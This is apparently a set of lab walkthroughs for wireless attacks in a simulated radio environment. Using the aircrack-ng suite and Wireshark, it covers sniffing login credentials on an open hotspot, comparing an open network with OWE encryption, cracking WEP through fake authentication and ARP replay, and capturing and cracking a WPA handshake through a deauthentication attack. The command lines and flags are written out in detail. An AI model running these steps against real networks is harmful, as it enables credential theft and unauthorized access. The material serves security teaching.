WIFI-SO-SERIOUS

LAB 1: Coffee Shop Attack

This lab demonstrates how to perform a passive sniffing attack on an open Wi-Fi network to capture and extract sensitive user data. You will focus on the SweetB-Guest SSID, which simulates an unencrypted public hotspot.

Phase 1: Preparation & Target Identification

Before you can sniff traffic, you must identify the target's operating channel and BSSID (MAC address).

• Enable Monitor Mode: Put your wireless card into monitor mode using airmon-ng start <wlan#>.

• Initial Reconnaissance: Run airodump-ng --band abg <wlan#mon> to scan for available networks.

• Locate Target: Look for SweetB-Guest in the output. Take note of its Channel (CH) and BSSID.

Phase 2: Traffic Capture

Once you have the target details, you will lock your card to that specific channel and save the traffic to a file.

• Targeted Sniffing: Use the following command to start capturing:

  airodump-ng -c <channel> --bssid <MAC> --essid SweetB-Guest <wlan#mon> -w <filename> --output-format pcap.

• Data Collection: This command saves all captured packets into a .pcap file in your current directory.

Phase 3: Traffic Analysis in Wireshark

After capturing traffic, you use Wireshark to inspect the protocols and extract data.

• Protocol Hierarchy: Navigate to Statistics -> Protocol Hierarchy to see which protocols are in use. You will likely see HTTP traffic, which is unencrypted.

• Filtering for Credentials: Use the display filter http.request.method == "POST" to find where users are submitting forms, such as login pages.

• Extracting Information:

  • Locate a POST /userinfo.php request.

  • Inspect the HTML Form URL Encoded section at the bottom of the packet details.

  • In this lab's example, you can find the username (uname) "Chewy" and password (pass) "lava lamp123".

Phase 4: Exporting Objects

If the user downloaded images or files over this unencrypted connection, you can reconstruct them.

• Export Tool: Go to File -> Export Objects -> HTTP.

• Save Files: This opens a list of all files sent over HTTP (images, scripts, HTML pages). You can select individual files or click Save All to extract them to your disk.

LAB 1.1: OWE vs. Open Network

In this lab, you will explore Opportunistic Wireless Encryption (OWE), also known as Enhanced Open. The goal is to compare how traffic looks on a standard open network versus one protected by OWE, which provides encryption without requiring a password.

Phase 1: Setting Up the OWE Access Point

Unlike the previous lab where you scanned for an existing network, here you will create the environment using simulated radios.

• Initialize Radios: Ensure you have four simulated radios ready using modprobe mac80211_hwsim radios=4.

• Navigate to Lab Directory: Change to the specific lab folder: cd /home/rogue1/lab-1/LAB-OWE.

• Kill any conflicting processes.

• Launch the AP: Start the Access Point using hostapd SweetB-OWE.conf.

• Verify State: You should see the interface (e.g., wlan0) transition to AP-ENABLED.

Phase 2: Connecting the Client

Next, you simulate a client connecting to this encrypted "open" network.

• Start the Client: Use wpa_supplicant to connect another interface (e.g., wlan1) using the OWE configuration

• Observe the Handshake: Watch the output for Key negotiation completed. You will notice that while no password was entered, the system negotiates a PMKSA-CACHE and a PTK CCMP (encryption key).

Phase 3: Traffic Sniffing & Analysis

Now, use a third radio to capture the traffic and analyze it.

Enable Monitor Mode:

Locate the Target: Scan all bands to find the channel and BSSID of SweetB-OWE:

Capture to PCAP: Once you have the channel (-c) and BSSID (--bssid), start a focused capture:

Phase 4: Traffic Analysis (The Comparison)

• The Key Difference: Look at the airodump-ng output for ENC and AUTH.

  • Standard Open (Lab 1): Shows ENC: OPN and AUTH: [empty].

  • OWE (Lab 1.1): Shows ENC: WPA3, CIPHER: CCMP, and AUTH: OWE.

  • Wireshark View: Open your .pcap file. Unlike Lab 1 where you could see HTTP POST data in plaintext , the OWE traffic will appear as 802.11 QoS Data and will be encrypted, making the data unreadable to the sniffer

Key Takeaway

On a standard open network, any attacker can see your HTTP traffic in plaintext. In an OWE environment, even though there is no password, the traffic between the client and the AP is encrypted, protecting users from passive sniffing

Clean up

Follow these steps to clear your environment:

• Kill Hostapd: Stop the simulated Access Point from the previous lab by running killall hostapd.

• Kill WPA Supplicant: Stop the virtual client by running killall wpa_supplicant.

• Remove the Virtual Driver: Completely remove the simulated radio module from the kernel using rmmod mac80211_hwsim.

LAB 2: Cracking WEP

To explain LAB-2 (WEP Lab), you need to understand the goal: we are exploiting the mathematical weakness of WEP by capturing and re-injecting packets to force the Access Point (AP) to generate a high volume of Initialization Vectors (IVs). Once we have enough IVs, we can solve for the key.

Here is your step-by-step walkthrough using specific interfaces for a multi-tab setup.

Phase 1: Environment Setup

In your first terminal tab, prepare the virtual radios and start the specific lab environment.

1. Clean the environment:

   killall hostapd wpa_supplicant; rmmod mac80211_hwsim

2. Start the Lab Script:

   cd /home/rogue1/lab-1/ ./Lab-r1.sh

3. Put wlan2 into Monitor Mode:

Note: This usually creates an interface named wlan6mon.

Phase 2: The Attack Walkthrough (Multi-Tab)

Tab A: Targeted Capture

First, see the running networks

This tab stays open to collect the "votes" (IVs) needed to crack the key.

• Monitor: Watch the #Data column. You need this number to start climbing fast.

Tab B: Fake Authentication

We use wlan6mon to "introduce" ourselves to the AP. Without this, the AP will ignore our injected traffic.

Command Breakdown

• aireplay-ng: The core tool used for 802.11 packet injection and generation.

• -1 6000: Specifies Fake Authentication mode. The 6000 tells the tool to re-authenticate every 6,000 seconds to keep the connection alive.

• -o 1: Sends only one set of authentication/association packets at a time (standard for most APs).

• -q 10: Sends "keep-alive" packets every 10 seconds to ensure the AP doesn't drop your connection due to inactivity.

• -e SweetB-WEP: The ESSID (name) of the target network.

• -a 02:00:00:00:00:00: The BSSID (MAC address) of the target Access Point.

• -h 02:00:00:00:06:00: Your Source MAC address. This is the MAC of the interface you are using to attack (e.g., wlan2mon).

• wlan2mon: The specific wireless interface you are using in monitor mode

• Success: Look for Association successful :-) (AID: 1).

Tab C: ARP Replay Attack

This is the engine. It listens for a network packet and re-broadcasts it 500 times per second.

Command Breakdown

• aireplay-ng: The tool used for 802.11 packet injection.

• -3: Specifies the ARP Request Replay attack mode.

• -b 02:00:00:00:00:00: Sets the BSSID (MAC address) of the target Access Point.

• -h 02:00:00:00:01:00: Sets the Source MAC address (usually your own interface's MAC or a successfully associated client).

• wlan6mon: The specific wireless interface you are using in monitor mode

• Troubleshooting: If data isn't rising, go to another tab and run ping 192.168.8.5 to generate the initial ARP packets the attack needs.

Tab D: Cracking the Key

You can run this while the other tabs are still working. It will update as more IVs are captured.

Expected Results

• IV Count: The attack will restart every 5,000 captured IVs until it finds the key.

• Key Found: When successful, you will see KEY FOUND! [ EA:BC:DE:F1:23 ] (example key).

• Decryption: It should report Decrypted correctly: 100%.

LAB-3 (WPA Lab)

To master LAB-3 (WPA Lab), you need to understand the mechanics of the "Deauthentication Attack" and the "4-Way Handshake." Unlike the WEP lab, we aren't generating traffic; we are forcing a client to reconnect so we can "eavesdrop" on the login process.

Phase 1: The Handshake Capture Walkthrough

Tab 1: Targeted Sniffing (airodump-ng)

First Check available WPA Networks and clients connected to it if any.

This command locks your card to a specific frequency and starts a recorder to catch the handshake.

• -c 36: Locks the sniffer to Channel 36, which is where the target AP is broadcasting.

• --bssid 02:00:00:00:02:00: Filters the capture to only show traffic from the specific target AP.

• -w WPA_Capture: Specifies the prefix for the output file (e.g., WPA_Capture-01.cap).

• --output-format pcap: Ensures the file is saved in the standard packet capture format for Wireshark and aircrack-ng.

Tab 2: Deauthentication Attack (aireplay-ng)

Since the client is already connected, we kick them off. When their device automatically tries to reconnect, they will send the handshake we need.

• Command: aireplay-ng -0 5 -a 02:00:00:00:02:00 -c 02:00:00:00:03:00 wlan2mon

• -0 5: Specifies a Deauthentication attack. The 5 tells the tool to send 5 bursts of deauth packets.

• -a 02:00:00:00:02:00: The MAC address of the Access Point (Target).

• -c 02:00:00:00:03:00: The MAC address of the specific client we want to disconnect (Victim).

• Watch for Success: In Tab 1, you must see "WPA handshake: 02:00:00:00:02:00" appear in the top right corner of the screen.

Phase 3: The Cracking Process (aircrack-ng)

Now that you have captured the "proof" of the password (the handshake), you use a computer to guess it offline

• Command: aircrack-ng -w /home/rogue1/opt/password.lst -b 02:00:00:00:02:00 WPA_Capture-01.cap

• Flag Breakdown:

  • -w /home/rogue1/opt/password.lst: Points to the dictionary file containing millions of potential passwords.

  • -b 02:00:00:00:02:00: Filters the capture file for just this specific network's handshake.

  • WPA_Capture-01.cap: The file you created in Tab 1 that contains the captured handshake.

Expected Result

If successful, aircrack-ng will display: KEY FOUND! [ password1 ]